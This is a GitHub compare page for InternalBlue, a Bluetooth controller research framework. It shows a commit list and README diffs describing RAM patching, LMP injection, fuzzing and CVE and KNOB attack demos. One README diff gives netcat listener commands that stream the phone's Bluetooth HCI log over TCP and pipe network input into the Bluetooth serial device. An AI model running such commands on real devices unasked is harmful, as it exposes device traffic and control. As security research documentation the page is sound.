GitHub/internalblue
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

merge into: GitHub/internalblue:blacklisting
Branches Tags
GitHub/internalblue:master GitHub/internalblue:hcisocket_user_channel GitHub/internalblue:ios-pcie GitHub/internalblue:improve_install_instructions GitHub/internalblue:fix_examples GitHub/internalblue:new-ios GitHub/internalblue:refactor_and_typing GitHub/internalblue:unpwn GitHub/internalblue:py3k GitHub/internalblue:testcases GitHub/internalblue:first_dict_nosetest GitHub/internalblue:hci_hooking GitHub/internalblue:blacklisting2 GitHub/internalblue:blacklisting
GitHub/internalblue:python2 GitHub/internalblue:v0.3
...
pull from: GitHub/internalblue:py3k
Branches Tags
GitHub/internalblue:master GitHub/internalblue:hcisocket_user_channel GitHub/internalblue:ios-pcie GitHub/internalblue:improve_install_instructions GitHub/internalblue:fix_examples GitHub/internalblue:new-ios GitHub/internalblue:refactor_and_typing GitHub/internalblue:unpwn GitHub/internalblue:py3k GitHub/internalblue:testcases GitHub/internalblue:first_dict_nosetest GitHub/internalblue:hci_hooking GitHub/internalblue:blacklisting2 GitHub/internalblue:blacklisting
GitHub/internalblue:python2 GitHub/internalblue:v0.3

143 Commits
blacklisting ... py3k

Author SHA1 Message Date
Florian Magin d3059b01d8 Fix subtle byte vs int issues ( 0 != '\x00 is True) 2020-02-27 11:18:21 +01:00
Florian Magin a7066170fc Declare startup trace on adbcore as flaky (works when run directly, doesn't work as part of suite) 2020-02-27 11:13:47 +01:00
Davide Toldo 748c713f67 Fix one of the traces in Python 3 2020-02-23 16:58:01 +01:00
Florian Magin 0864e96569 Propagate exceptions to test framework, ensure required pwnlibs version, ensure that traces don't abort early 2020-02-20 15:23:03 +01:00
Davide Toldo c6e39cb18f * Make pytest testcases Python 2 & 3 compatible 
* Make InternalBlue start with ADBCore in Python 3
* Make InternalBlue start with HCICore in Python 3
* Substitute var.decode('hex') with bytearray.fromhex(var) in most places I found which works in Python 2 and 3 and performs the same task
* Substitute var.encode('hex') with new byte_to_hex function that works with Python 2 and 3 (in util.py)
* Declare variables explicitly as bytes instead of strings
* Fix small issue in macOS Core (explicit declaration of variable as byte)
 2020-02-17 03:02:59 +01:00
Davide Toldo 07c5c4c336 * CLI now starts up (at least on mac) on Python 2 and 3 
* Tests run, some throw errors.
 2020-02-16 20:07:23 +01:00
Florian Magin 01589f8eee Hack around pwnlibs treating everything as bytes 2020-02-15 16:58:54 +01:00
Florian Magin d9de8f0d83 Some byte fixes in hcicore 2020-02-15 16:58:19 +01:00
Florian Magin 9b8d5b0740 Move requirements to setup.py 2020-02-15 16:51:43 +01:00
Florian Magin e53edb1ec9 Some byte fixes 2020-02-15 16:51:30 +01:00
Florian Magin b72e12b5a6 Fix subtle syntax change for python3 2020-02-15 16:39:59 +01:00
Florian Magin d7b3b8e7a1 First steps of automatic Python3 conversion 
Commands in order:
- `futurize ./ -w -n`

- git grep -l "queue\.Empty" | xargs sed -i 's/queue\.Empty/queue2k.Empty/'

- git grep -l "queue\.Queue" | xargs sed -i 's/queue\.Queue/queue2k.Queue/'

- git grep -l "import queue" | xargs sed -i 's/import queue/import queue as queue2k/'

The search and replaces are needed because the local variables named
`queue` break the module that is called `queue` instead of `Queue` in
Python3

The testcases all still pass with python 2 but with python3 break
completely due to pwnlib issues
 2020-02-15 15:52:12 +01:00
Florian Magin 2e49149639 Make ReplaySocket less verbose 2020-02-15 15:39:13 +01:00
Florian Magin 71b706139f Remove broken attempt at logging replacement 2020-02-15 14:48:23 +01:00
Florian Magin 2d713fcba6 Rename and skip broken trace tests 2020-02-15 14:35:57 +01:00
Florian Magin 79c94ab48b Move parsing logic to ConnectionInformation class 2020-02-15 14:28:37 +01:00
Florian Magin d691765c2b Linting related changes 2020-02-15 14:28:37 +01:00
Davide Toldo 004ee68fe5 Create object to pass around connection information instead of a dictionary 2020-02-15 14:28:37 +01:00
Davide Toldo fce72a2e8d Create object to pass around queue information instead of a dictionary 
Signed-off-by: Davide Toldo <davide.toldo@stud.tu-darmstadt.de>
 2020-02-15 14:28:37 +01:00
Davide Toldo b57d3d417f Add test for third dictionary (queue info) 2020-02-15 14:28:37 +01:00
Davide Toldo 4e9e82619a Add test for second dictionary, but new heap structure 2020-02-15 14:28:37 +01:00
Davide Toldo 657714acc6 Add test for second dictionary 2020-02-15 14:28:37 +01:00
Florian Magin 3b0478b0a5 First dict nosetest (#15) 
* Add nose test for connection information retrieval

* forgot to add the required testcase

* Add new info connections trace where a device is actually connected

* Add nose test for connection information retrieval with real device connected

* Clean up structure
Add Galaxy S8 traces (new heap structure)
Delete unnecessary, failing macOS trace

* Add two more traces that cover the new memory layout branch in readHeapInformation

* Turn info_conn into proper tests

* Move the trace tests to a separate module

Co-authored-by: Davide Toldo <davidetoldo@posteo.de>
 2020-02-15 14:28:37 +01:00
Florian Magin b386edbee1 Save all exceptions in the hooks into the core and add better error printing to the main thread (only works if some hook is active for now) 2020-02-15 14:28:37 +01:00
Florian Magin 6badef2279 Fix Hook Signatures to include the reference to the running core 2020-02-15 14:28:37 +01:00
Florian Magin f8e638e277 Allow main thread to detect when the send thread crashed with an AssertError and reraise it for full context and so testing frameworks can detect the failure 2020-02-15 14:28:37 +01:00
Florian Magin 1dfcc04a51 Remove the old method that manually searched the tests. Replaced with generate_test_suite to generate a UnittestSuite 2020-02-15 14:28:37 +01:00
Florian Magin 20a458d483 Rename the test function so it doesn't start with "test_" which confuses test frameworks and makes it clear that this function isn't a valid testcase by itself 2020-02-15 14:28:37 +01:00
Davide Toldo 8f63c5620e * Add ability to send ACL Data in macOS 
* Clean up IOBluetoothExtended framework
 2020-02-15 14:28:37 +01:00
Davide Toldo 1e88694f69 Add second patchrom trace for ADB Core for other branch 2020-02-15 14:28:37 +01:00
Davide Toldo 47640bdd58 Add patchrom trace for ADB Core 2020-02-15 14:28:37 +01:00
Florian Magin b10c6764b8 Allow test module to be tested with unittest by dynamically generating a test suite from trace files 2020-02-15 14:28:37 +01:00
Davide Toldo 9d4dab89f9 Add connection created / completed trace 2020-02-15 14:28:37 +01:00
Florian Magin 9e10339c9b More adbcore traces 2020-02-15 14:28:37 +01:00
Florian Magin e2fca88f2e Refactor replaying to centralise replay logic 2020-02-15 14:28:37 +01:00
Florian Magin 54470b7395 Mitigate race condition in replay 2020-02-15 14:28:37 +01:00
Davide Toldo d71e422884 Update gitignore 2020-02-15 14:28:37 +01:00
Davide Toldo c7ba318014 Add some traces 2020-02-15 14:28:37 +01:00
Davide Toldo 68d87b6e66 Hook ADBCore 2020-02-15 14:28:37 +01:00
Davide Toldo 4df59ca00c Make macos core less verbose (forgot to remove line) 2020-02-15 14:28:37 +01:00
Davide Toldo d9fd55bded Add 2 ADB traces 2020-02-15 14:27:35 +01:00
Florian Magin 532c36f8c9 Add wrappers to run trace tests via Python (to support IDE integration) 2020-02-15 14:27:35 +01:00
Florian Magin e339d34eca Allow CLI arguments to be passed in via an already parsed namespace instead 2020-02-15 14:27:35 +01:00
Florian Magin f1dadd9e79 Add command to hexdump trace 2020-02-15 14:27:35 +01:00
Florian Magin 225924ed5a Remove broken trace files 2020-02-15 14:27:35 +01:00
Florian Magin 96a9857229 Move traces to dedicate folders per core 2020-02-15 14:27:35 +01:00
Davide Toldo fc8258a072 Fix getsockname hook to work with macos framework 2020-02-15 14:27:35 +01:00
Davide Toldo 7f792d44cf Add pyobjc as optional dependency for macoscore 2020-02-15 14:27:35 +01:00
Florian Magin c0c3583361 Fix readafh.trace 2020-02-15 14:27:35 +01:00
Florian Magin bfa8902e56 Only close sockets once 2020-02-15 14:27:35 +01:00
Florian Magin 246fcd4e3e Fix MacOS replay and make it work on non MacOS platforms 2020-02-15 14:27:35 +01:00
Davide Toldo 21377ee4da Move init of IOBE to initializer of macOS core 2020-02-15 14:27:35 +01:00
Davide Toldo 9a33fda745 Add startup trace 2020-02-15 14:27:35 +01:00
Davide Toldo 4642ff4fa5 Add some traces 2020-02-15 14:27:35 +01:00
Florian Magin 1927b2ed15 Add generic trace test, example traces, and allow command to be specified in trace 2020-02-15 14:27:35 +01:00
Davide Toldo 7472ddf388 Make tracing work on macOS (sort of) 2020-02-15 14:27:35 +01:00
Florian Magin ac94f9295d Implement save and replay of traces 2020-02-15 14:27:35 +01:00
Florian Magin b81e4c861a Hci hooking (#13) 
* Partial refactoring of hooking

* Fix logging in core.py and print exceptions in _sendThreadFunc in the log

* Refactor hci hooking
 2020-02-15 14:27:35 +01:00
Florian Magin ca7a2071b1 Add recvfrom in SocketRecvHook 2020-02-15 14:27:35 +01:00
Florian Magin 3902a17680 Add lowest level HCI tracing functionality 2020-02-15 14:27:35 +01:00
Florian Magin 13c435b56e Fix minor None check 2020-02-15 14:27:35 +01:00
Florian Magin 63b4177a65 Allow specification of decive via CLI arg 2020-02-15 14:27:35 +01:00
Florian Magin 4979dfd428 Add type annotation to device_list 2020-02-15 14:27:35 +01:00
Florian Magin 8a5f478ed3 Add required interface methods as NotImplemented 2020-02-15 14:27:35 +01:00
Florian Magin 2d97d0cb13 Add hci command test 2020-02-15 14:27:35 +01:00
Florian Magin a2e3929512 Add first testcases 2020-02-15 14:27:35 +01:00
Florian Magin e73299de42 Make args to internalblue_cli explicit so it can be called with custom args from python 2020-02-15 14:27:35 +01:00
Florian Magin b2c0ff6a62 Annotate testcore device_list 2020-02-15 14:27:35 +01:00
Florian Magin fdc47f52f8 Remove usage of logging wrapper for now 2020-02-15 14:27:35 +01:00
Florian Magin 5141aafaa9 Add --overwrite to memdump for testing 2020-02-15 14:27:35 +01:00
Florian Magin 8bc9b2c373 Add logging wrapper 2020-02-15 14:27:35 +01:00
Florian Magin c3d6c6dd6b Add init command argument for testing 2020-02-15 14:27:35 +01:00
Florian Magin 40909ed594 Annotations and import fixes 2020-02-15 14:27:35 +01:00
Florian Magin 29fd6420dd Minor fixes and annotations 2020-02-15 14:27:35 +01:00
Florian Magin 87a9496a19 Add type annotations for cmds 2020-02-15 14:27:35 +01:00
Florian Magin 62eda55e32 Type annotations for core.py and general type aliases 2020-02-15 14:27:35 +01:00
Davide Toldo eacd04811b Add write memory functionality to testcore 2020-02-15 14:27:35 +01:00
Davide Toldo 5959cd70f2 Fix bug 2020-02-15 14:27:35 +01:00
Davide Toldo ec3bddd71b Fix bug 2020-02-15 14:27:35 +01:00
Davide Toldo c8cda935a6 Some cleanup 2020-02-15 14:27:35 +01:00
Davide Toldo 854f57a3f9 Functional startup and memory reads 2020-02-15 14:27:35 +01:00
Jiska Classen e89a84812e updated readme 2020-02-06 00:55:20 +01:00
Jiska Classen dd9d76cff9 Merge branch 'master' of https://dev.seemoo.tu-darmstadt.de/bcm/internalblue 2020-02-03 23:38:32 +01:00
Jiska Classen 58f9688b84 updated firmware files 2020-02-03 23:38:00 +01:00
Davide Toldo 45ec18744e Make macos core less verbose (forgot to remove line) 2020-01-22 12:52:07 +01:00
Davide Toldo 45054b68c7 Use seemoo bundle identifier in macoscore 2019-12-22 15:36:16 +01:00
Davide Toldo 09149a2986 Merge branch 'master' of https://dev.seemoo.tu-darmstadt.de/bcm/internalblue 2019-12-22 14:49:09 +01:00
Davide Toldo dd19701c29 Use seemoo bundle identifier and 1 little change for disconnection complete 2019-12-22 14:48:49 +01:00
Jiska Classen a7ca8986d5 KNOB for Nexus 6P 2019-12-11 20:05:02 +01:00
Jiska Classen bf023043fb EWSN Paper: RXDN hook (BLE_Reception_PoC.py) 2019-12-11 13:58:58 +01:00
Davide Toldo 8045ff091e Merge branch 'master' of https://dev.seemoo.tu-darmstadt.de/bcm/internalblue 2019-11-16 19:02:51 +01:00
Davide Toldo b8a2ce4b88 Cleanup some dead code 2019-11-16 19:02:25 +01:00
Dennis Heinze 5096123ffe Make internalblue on iOS reliable by buffering and checking H4 data 2019-11-13 19:29:38 +01:00
Dennis Heinze db7f30e26d Remove buffering and make ios-proxy more reliable 2019-11-13 19:27:41 +01:00
Dennis Heinze ab5e8f2c91 Add more iPhone 7 FW details 2019-11-13 19:26:36 +01:00
Jiska Classen 4c13360fdd only import macos core if we are on macos (otherwise unneeded dependencies are included) 2019-10-23 17:12:12 +02:00
Davide Toldo 8eb34e7ba9 Remove unnecessary output from framework 
Add instructions for Wireshark
 2019-10-23 12:54:51 +02:00
Davide Toldo 9aae6af582 * Add source of macOS framework and build instructions 
* Add automatic detection of macOS - no -m parameter needed anymore
 2019-10-23 12:24:21 +02:00
Davide Toldo 2becb2c677 Improve Mac instructions 2019-10-21 12:31:49 +02:00
Davide Toldo baa828e54c macOS bugfixes: 
* Fix bug that showed "connection complete" twice with a broken second response
* Fix bug that caused a crash if cancelling a connection request from the mac
 2019-10-15 02:13:12 +02:00
Jiska Classen 4577f04292 minor fix for macos vs ios core, added iphone 6 patchram support 2019-10-15 00:43:47 +02:00
Davide Toldo 4390105641 Minor changes for macOS 2019-10-09 14:22:29 +02:00
Davide Toldo c6486bb4e2 Minor changes for macOS 2019-10-09 14:08:22 +02:00
Davide Toldo a1b3b88afc Add macOS support 2019-10-09 13:34:38 +02:00
Davide Toldo e049bbb622 Add fw file 2019-10-09 13:24:28 +02:00
Davide Toldo 982d403ec0 Fix connection complete for incoming requests and disconnection complete 2019-10-09 13:21:49 +02:00
Jiska Classen 383dfaf554 minor port number bugfix and fw addition 2019-10-09 13:21:29 +02:00
Davide Toldo af7df43f0b Improve Syntax 2019-10-03 18:19:14 +02:00
Davide Toldo 29f3817b0c Pass command length to IOBE; fixes non-working writeMem for example 2019-10-01 16:08:31 +02:00
Davide Toldo f63248480b * Add significantly faster IOBE Framework 
* Use random ports instead of hardcoded ones
* Update macos requirements
 2019-10-01 14:31:23 +02:00
Davide Toldo e66f506ac3 Switch to UDP 2019-10-01 01:13:22 +02:00
Jiska Classen 9d9b98ce71 new nexus5 knob poc with automatic callback 2019-09-28 03:05:57 +02:00
Davide Toldo f6fbe61d0f Optimize framework a bit and comment out a debug output in macOS core 2019-09-27 02:02:01 +02:00
Jiska Classen 6d3eb20e77 minor fixes in existing fw files, updated device database 2019-09-26 14:34:45 +02:00
Davide Toldo 5a64fefcaf Add firmware file for MBPr 2014 2019-09-24 16:06:21 +02:00
Davide Toldo 88734f1627 Update Framework 2019-09-24 16:05:54 +02:00
Davide Toldo ecbc710be2 Result from Bluetooth chip is now correctly returned via TCP socket. Simplified access from Python: Only create a single object with the in and output ports as parameters. 2019-09-20 20:53:34 +02:00
Jiska Classen 598a72dc50 updated hardware database, added rpi3 poc for knob 2019-09-19 09:59:11 +02:00
Davide Toldo 4b4a91db37 Use TCP Sockets to send commands to IOBluetoothExtended and to receive the result. Works perfectly, on its own thread etc., but currently returns a dummy response instead of a response from the Chip. 2019-09-19 03:10:17 +02:00
Jiska Classen 594bedfc7f updated readmes 2019-09-16 15:10:40 +02:00
Davide Toldo 4b6dba5252 Current status: 
* Framework works
* Communication with Python works
* Both over UDP and via Objc NSNotificationCenter
* Current issue: Doesn't work on (background?) threads e.g. _sendThreadFunc
 2019-09-05 01:29:29 +02:00
Davide Toldo 88f66a5fe1 Add macOS core to cli.py 2019-09-05 01:26:29 +02:00
Jiska Classen 9cd8c64104 KNOB PoCs for RPi 3+/4, Galaxy S8, CYW20735, Nexus 5 2019-09-04 22:47:38 +02:00
Jiska Classen 06ac829bce added new fw versions 2019-09-03 10:31:14 +02:00
Jiska Classen 575ed8e38a serial mode as switch that does not even try bluetooth.default.so 2019-09-02 21:46:48 +02:00
Jiska Classen cd9f65a51d support for iphone 8/x/xr 2019-08-30 14:48:13 +02:00
Jiska Classen 35dd491192 added new firmwares and some notes on the ios-proxy 2019-08-29 23:03:26 +02:00
Jiska Classen 2ec000cf69 iOS testing and bugfixing (iPhone SE, iOS 12.4) 2019-08-24 01:46:08 +02:00
Jiska Classen f8311834b2 breakpoints 2019-08-17 12:51:03 +02:00
Jiska Classen 16b33a366c automatic detection of bluetooth interface and logfile on android 2019-08-12 23:53:45 +02:00
Jiska Classen aa306d531e adapted READMEs to code 2019-08-07 17:37:29 +02:00
Jiska Classen 395e633577 coredumps for s10* 2019-08-07 17:00:19 +02:00
Jiska Classen 252b6e0ab8 added samsung s10/s10e/s10+ support for rooted stock rom 2019-08-06 18:20:35 +02:00
jiska 245be1873f firmware versions of pauls devices 2019-07-31 11:12:18 +02:00
Jiska Classen 6f6720855f corrected and tested address for raspi 3+/4 2019-07-23 13:42:55 +02:00
Jiska Classen 7685005a2f sendlcp for raspi 3/3+/4 2019-07-23 13:36:10 +02:00
Jiska Classen 54d839e8e2 sendlcp command, did first tests with nexus 5 that seemed to work 2019-07-22 21:30:16 +02:00
Jiska Classen 2358acf26c bugfixes for handling patchram with different lengths/addresses 2019-07-18 14:16:16 +02:00
Jiska Classen 83cf9c63e0 tracepoints for cyw20719 2019-07-17 21:14:16 +02:00
Jiska Classen cea981c647 updated instructions for linux 2019-07-16 11:37:12 +02:00
Jiska Classen 636a4163e6 raspian readme 2019-07-16 11:13:03 +02:00
Jiska 03d6f45aef rpi3 bd_addr 2019-07-10 15:40:09 +01:00
Jiska Classen 2bd937b4e2 rpi3 2019-07-10 15:41:03 +02:00
122 changed files with 12844 additions and 610 deletions
Expand all files Collapse all files
.gitignore
+8
View File
@@ -17,3 +17,11 @@ btsnoop.log
# xcode
xcuserdata
*.xcworkspace
macos-framework/IOBluetoothExtended.framework/
# venv
venv
venv3
# pycharm
*.idea
README.md
+136 -106
View File
@@ -8,20 +8,143 @@ therefore implement monitoring and injection tools for the lower layers of
the Bluetooth protocol stack.
Publications and Background
---------------------------
* **Master Thesis** (07/2018)
*InternalBlue* was initially developed and documented in the
[Masterthesis](https://github.com/seemoo-lab/internalblue/raw/master/internalblue_thesis_dennis_mantz.pdf) by Dennis Mantz.
Afterwards the development was continued by SEEMOO. It was awarded with the [CAST Förderpreis](https://www.cysec.tu-darmstadt.de/cysec/start_news_details_136448.en.jsp).
* **MRMCD Talk** (09/2018)
The basic framework for Nexus 5 / BCM4339 was presented at the MRMCD Conference
2018 in Darmstadt. The talk was also [recorded](https://media.ccc.de/v/2018-154-internalblue-a-deep-dive-into-bluetooth-controller-firmware) and includes an overview of the framework as well as
two demo usages at the end (Following a **Secure Simple Pairing procedure in
Wireshark** and implementing a **proof of concept for CVE-2018-5383**).
* **35C3 Talk** (12/2018)
More extensions were [presented](https://media.ccc.de/v/35c3-9498-dissecting_broadcom_bluetooth) at 35C3 2018 in Leipzig. New features include
creating connections to non-discoverable devices. Moreover, we gave a **demo of
CVE-2018-19860**, which can crash Bluetooth on several Broadcom chips. This talk
was also recorded and gives a more high level overview.
* **TROOPERS Talk** (03/2019)
* **WiSec Paper** (05/2019)
Our WiSec paper [Inside Job: Diagnosing Bluetooth Lower Layers Using Off-the-Shelf Devices](https://arxiv.org/abs/1905.00634) on reversing the
Broadcom Bluetooth diagnostics protocol was accepted, demonstrated and got the replicability label.
* **MobiSys Paper** (06/2019)
Our MobiSys paper [InternalBlue - Bluetooth Binary Patching and Experimentation Framework
](https://arxiv.org/abs/1905.00631) on the complete *InternalBlue* ecosystem got accepted.
* **REcon Talk** (06/2019)
We gave a talk at REcon, [Reversing and Exploiting Broadcom Bluetooth](https://cfp.recon.cx/reconmtl2019/talk/EQTRGU/).
It provides a first intuition on how to do binary patching in C with Nexmon to change Bluetooth functionality.
* **MRMCD Talk** (09/2019)
Our talk [Playing with Bluetooth](https://media.ccc.de/v/2019-185-playing-with-bluetooth) focuses on new device support
within *InternalBlue* and the Patchram state of various devices.
* **36C3 Talk** (12/2019)
The rather generic talk [All wireless communication stacks are equally broken](https://media.ccc.de/v/36c3-10531-all_wireless_communication_stacks_are_equally_broken)
points out a couple of new research directions and new Bluetooth projects coming up.
* **EWSN Paper & Demo** (02/2020)
We did some work on improving blacklisting performance of BLE data connections. Currently in a separate *blacklisting* branch.
Supported Features
------------------
This list is subject to change, but we give you a brief overview. You probably have a platform with a Broadcom chip that supports most features :)
On any Bluetooth chip:
* Send HCI commands
* Monitor HCI
* Establish connections
On any Broadcom Bluetooth chip:
* Read and write RAM
* Read and write assembly to RAM
* Read ROM
* Set defined breakpoints that crash on execution
* Inject arbitrary valid LMP messages (opcode and length must me standard compliant, contents and order are arbitrary)
* Use diagnostic features to monitor LMP and LCP (with new **Android** H4 driver patch, still needs to be integrated into BlueZ)
* Read AFH channel map
On selected Broadcom Bluetooth chips:
* Write to ROM via Patchram (any chip with defined firmware file >= build date 2012)
* Interpret core dumps (Nexus 5/6P, Samsung Galaxy S6, Evaluation Boards, Samsung Galaxy S10/S10e/S10+)
* Debug firmware with tracepoints (Nexus 5 and Evaluation Board CYW20735)
* Fuzz invalid LMP messages (Nexus 5 and Evaluation Board CYW20735)
* Inject LCP messages, including invalid messages (Nexus 5, Raspberry Pi 3/3+/4)
* Full object and function symbol table (Cypress Evaluation Boards only)
* Demos for Nexus 5 only:
* ECDH CVE-2018-5383 example
* NiNo example
* MAC address filter example
* KNOB attack test for various devices, including Raspberry Pi 3+/4
A comprehensive list of chips and which devices have them can be found in the [firmware](internalblue/fw/README.md) module documentation.
Requirements
------------
Android:
* Ideally recompiled `bluetooth.default.so`, but also works on any rooted smartphone, see [Android instructions](android_bluetooth_stack/README.md)
* Android device connected via ADB
* Best support is currently given for Nexus 5 / BCM4339 and Evaluation Boards
* Optional: Patch for Android driver to support Broadcom H4 forwarding
* Optional, if H4: Wireshark [Broadcom H4 Dissector Plugin](https://github.com/seemoo-lab/h4bcm_wireshark_dissector)
Linux:
* BlueZ, instructions see [here](linux_bluez/README.md)
* Best support for Raspberry Pi 3/3+/4
* For most commands: Privileged access
iOS:
* A jailbroken iOS device (tested on iOS 12.1.2/12.4 with iPhone 6, SE, 7, 8, X)
* The included `ios-proxy` (instructions in [here](ios-proxy/README.md))
* Optional: a Mac with `xcode` to compile the proxy yourself
* Optional, no jailbreak required: install [iOS Bluetooth Debug Profile](https://developer.apple.com/bug-reporting/profiles-and-logs/) to obtain
HCI and diagnostic messages, either via diagnostic report feature (all iOS versions) or live with PacketLogger (since iOS 13)
macOS:
* Homebrew
* Xcode 10.2.1
* Instructions see [here](macos-framework/README.md)
Setup and Installation
----------------------
The framework uses __ADB__ (Android Debug Bridge) to connect to an Android
smartphone, __BlueZ__ sockets on Linux, or the included __iOS Proxy__ on iOS.
For ADB, either connect the phone via USB or setup ADB over TCP and make sure you
For [Android](android_bluetooth_stack) with ADB, either connect the phone via USB or setup ADB over TCP and make sure you
enable USB debugging in the developer settings of Android.
The Android device needs to run a Bluetooth stack that was compiled with
debugging features enabled. A detailed description on how to compile the
Bluetooth stack for your device can be found in the *README.md* file inside the
*android_bluetooth_stack* directory of this repository. It also contains
precompiled stacks for some devices. InternalBlue does not work without the
debug Bluetooth stack.
If you have a jailbroken [iOS](ios-proxy) device, you need to install a proxy that locally connects
to the Bluetooth device and forwards HCI commands and events.
On [Linux](linux_bluez) with *BlueZ*, everything should work out of the box, but
you need to execute *InternalBlue* as root for most features.
The InternalBlue framework is written in Python 2. You can install it together
with all dependencies by using pip:
@@ -60,6 +183,11 @@ All steps on a plain Ubuntu 18.04:
make
make install
Packets required on a current (July 2019) Raspian:
sudo apt-get --allow-releaseinfo-change update
sudo apt-get install git python-setuptools binutils-arm-none-eabi adb python-pip python-dev gcc libffi-dev
Usage
@@ -89,105 +217,7 @@ because the leading two bytes are not required by Bluetooth communication, you
can replace them with anything you want.
Requirements
------------
Android:
* Recompiled `bluetooth.default.so` built with `bdroid_CFLAGS='-DBT_NET_DEBUG=TRUE'`, see [build instructions](android_bluetooth_stack/README.md)
* Android device connected via ADB
* Best support is currently given for Nexus 5 / BCM4339
* Optional: Patch for Android driver to support Broadcom H4 forwarding
Linux:
* BlueZ
* Optional: Privileged access
iOS:
* A jailbroken iOS device
* The included ios-proxy (instructions in [here](ios-proxy/README.md))
* Optional: a Mac with xcode to compile the proxy yourself
Common Optional Requirements:
* Wireshark [Broadcom H4 Dissector Plugin](https://github.com/seemoo-lab/h4bcm_wireshark_dissector)
Supported Features
------------------
This list is subject to change, but we give you a brief overview. You probably have a platform with a Broadcom chip that supports most features :)
On any Bluetooth chip:
* Send HCI commands
* Monitor HCI
* Establish connections
On any Broadcom Bluetooth chip:
* Read and write RAM
* Read and write assembly to RAM
* Read ROM
* Inject arbitrary valid LMP messages (opcode and length must me standard compliant, contents and order are arbitrary)
* Use diagnostic features to monitor LMP and LCP (with new **Android** H4 driver patch, still needs to be integrated into BlueZ)
* Read AFH channel map
* Perform local RSSi sweep (coming soon!)
On selected Broadcom Bluetooth chips:
* BCM4335C0, BCM4358A3, CYW20735
* Write to ROM via Patchram
* Interpret coredumps
* BCM4335C0 only
* ECDH CVE-2018-5383 example
* NiNo example
* MAC address filter example
* Debug firmware with tracepoints
* BCM4335C0 and CYW20735
* Fuzz invalid LMP messages
* CYW20735 only
* Full object and function symbol table
A comprehensive list of chips and which devices have them can be found in the [firmware](internalblue/fw/README.md) module documentation.
Background
----------
* **Master Thesis** (07/2018)
InternalBlue was initially developed and documented in the
[Masterthesis](https://github.com/seemoo-lab/internalblue/raw/master/internalblue_thesis_dennis_mantz.pdf) by Dennis Mantz.
Afterwards the development was continued by SEEMOO. It was awarded with the [CAST Förderpreis](https://www.cysec.tu-darmstadt.de/cysec/start_news_details_136448.en.jsp).
* **MRMCD Talk** (09/2018)
The basic framework for Nexus 5 / BCM4339 was presented at the MRMCD Conference
2018 in Darmstadt. The talk was also [recorded](https://media.ccc.de/v/2018-154-internalblue-a-deep-dive-into-bluetooth-controller-firmware) and includes an overview of the framework as well as
two demo usages at the end (Following a **Secure Simple Pairing procedure in
Wireshark** and implementing a **proof of concept for CVE-2018-5383**).
* **35C3 Talk** (12/2018)
More extensions were [presented](https://media.ccc.de/v/35c3-9498-dissecting_broadcom_bluetooth) at 35C3 2018 in Leipzig. New features include
creating connections to non-discoverable devices. Moreover, we gave a **demo of
CVE-2018-19860**, which can crash Bluetooth on several Broadcom chips. This talk
was also recorded and gives a more high level overview.
* **TROOPERS Talk** (03/2019)
* **WiSec Paper** (05/2019)
Our WiSec paper [Inside Job: Diagnosing Bluetooth Lower Layers Using Off-the-Shelf Devices](https://arxiv.org/abs/1905.00634) on reversing the
Broadcom Bluetooth diagnostics protocol was accepted, demonstrated and got the replicability label.
* **MobiSys Paper** (06/2019)
Our MobiSys paper [InternalBlue - Bluetooth Binary Patching and Experimentation Framework
](https://arxiv.org/abs/1905.00631) on the complete *InternalBlue* ecosystem got accepted.
* **REcon Talk** (06/2019)
We gave a talk at REcon, [Reversing and Exploiting Broadcom Bluetooth](https://cfp.recon.cx/reconmtl2019/talk/EQTRGU/).
It gives a first intuition on how to do binary patching in C with Nexmon to change Bluetooth functionality.
@@ -195,7 +225,7 @@ was also recorded and gives a more high level overview.
License
-------
Copyright 2018-2019 Dennis Mantz, Jiska Classen
Copyright 2018-2020 The InternalBlue Team
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
android_bluetooth_stack/README.md
+30 -1
View File
@@ -2,7 +2,7 @@ Enable Debugging Features in the Android Bluetooth Stack
========================================================
The Android Bluetooth stack has [debugging features](https://chromium.googlesource.com/aosp/platform/system/bt/+/master/doc/network_ports.md)
which are disabled in normal builds. To enable them, the Bluetooth Stack
which are disabled in normal builds. To enable them, the Bluetooth stack
(*bluetooth.default.so*) has to be build with debugging preprocessor defines.
Another issue is that the Android Bluetooth stack does not support Broadcom
@@ -17,11 +17,40 @@ been created according to the tutorial below. You can skip the build if you
happen to have a device for which a precompiled *bluetooth.default.so* exists.
NEW: Serial Forwarding
----------------------
With Android Oreo (8), significant parts of the network debug interface
were removed from the source code. Reintroducing these features would be ABI-breaking.
We introduced an experimental serial forwarding. If the connection to a
patched Bluetooth stack fails on Android, *InternalBlue* tries to setup sockets
with shell scripting. The only requirement is a rooted smartphone. This hack
even works on a recent __Samsung Galaxy S10e__ with __Android Pie (9)__ (Patchlevel June 2019).
In `adbcore.py`, we have a fallback that executes `_setupSerialSu`. This starts the
following processes:
tail -f -n +0 /data/log/bt/btsnoop_hci.log | nc -l -p 8872
nc -l -p 8873 >/sdcard/internalblue_input.bin
tail -f /sdcard/internalblue_input.bin >>/dev/ttySAC1
To run netcat, you need to install the `busybox` app. Depending on your Android version,
the paths for `*btsnoop_hci.log` and `/dev/tty*` might differ. Execute `lsof | grep bluetooth`
to get hints on the serial device used for Bluetooth.
Note that this solution is much slower than patching *bluetooth.default.so*.
The delay per command is quite long, but overall throughput is okay, i.e., stackdumps can
be received.
Prebuilt Library Status
-----------------------
Folder | Tag | HCI forwarding | H4 Broadcom Diagnostics | Notes
------ | --- | -------------- | ----------------------- | -----
none | Android 8+9 | yes | no | Serial and BT Snoop forwarding with `nc` (in `busybox` app), tested on rooted __Samsung Galaxy S10e__
android5_1_1 | android-5.1.1_r3 | rx only | no | Tested on Nexus 5 - HCI sniffing only!
android6_0_1 | android-6.0.1_r81 | yes | __yes__ | Recommended for __Nexus 5__ (android-6.0.1_r77), also works on Nexus 6P, seems like the version tag can differ a bit.
android7_1_2 | android-7.1.2_r28 | yes | __yes__ | Recommended for __Nexus 6P__, but it might run on Nexus 5X, Nexus Player, Pixel C.
dummymemdump.bin
BIN
View File
Binary file not shown.
examples/README.md
+44 -6
View File
@@ -1,10 +1,48 @@
InternalBlue PoCs and Examples
==============================
All examples were tested on a *Nexus 5* (*BCM4339* chip with firmware *BCM4335C0*) on *Android* and *LineageOS*.
* [CVE_2018_5383_Invalid_Curve_Attack_PoC](CVE_2018_5383_Invalid_Curve_Attack_PoC.py)
provides tries to set the y-coordinate during ECDH key exchange to zero. If the device under test accepts the pairing (50% probability), it is vulnerable.
* [LMP_MAC_Address_Filter](LMP_MAC_Address_Filter.py)
